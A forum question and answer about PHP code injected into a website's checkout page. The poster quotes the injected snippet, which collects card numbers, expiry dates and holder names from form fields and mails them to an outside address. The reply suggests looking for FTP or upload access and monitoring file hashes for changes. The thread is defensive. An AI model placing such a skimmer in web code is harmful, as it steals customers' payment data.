Avoiding PHP injection to Post data from a form

Question

I was just re-testing the flow in a website we have created and when I got to the Checkout section, I realized there was some code in the page that we had never written. It was an injection and it really scared us. The code was just put as text in one of the checkout files so it wouldn't execute since it was was not within PHP tags, but it was pretty scary.

The code was essentially Posting each of the fields for payment instructions (name on card, card type, card number, cvc, expiration date) and then executing a mail() php function to send the information to a specific email. I even have the email of the hacker!!

$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);

How could we avoid PHP injections in our site? I contacted Stripe, who supports our payments to check if their API is safe enough. I think it is. However, mailing information and other information non-payment related could be easily hacked with an injection like this. How could we avoid injections in our files?

Thanks!!

Answer 1

That would take a rather smart bot to detect that and inject it in the right place.. Someone has access to the FTP or has uploaded a PHP file manager -- which could have came from a file upload script.

Once you get everything cleaned up, perhaps you could take a "hash snapshot" of the files.. then scan through them (either automated or manually) to test for hash changes. If there's anything changed in the file, the hash of the file will change as well - then you could have it alert someone. From there, you can go through the logs and try to figure out where it came from.

Just an idea.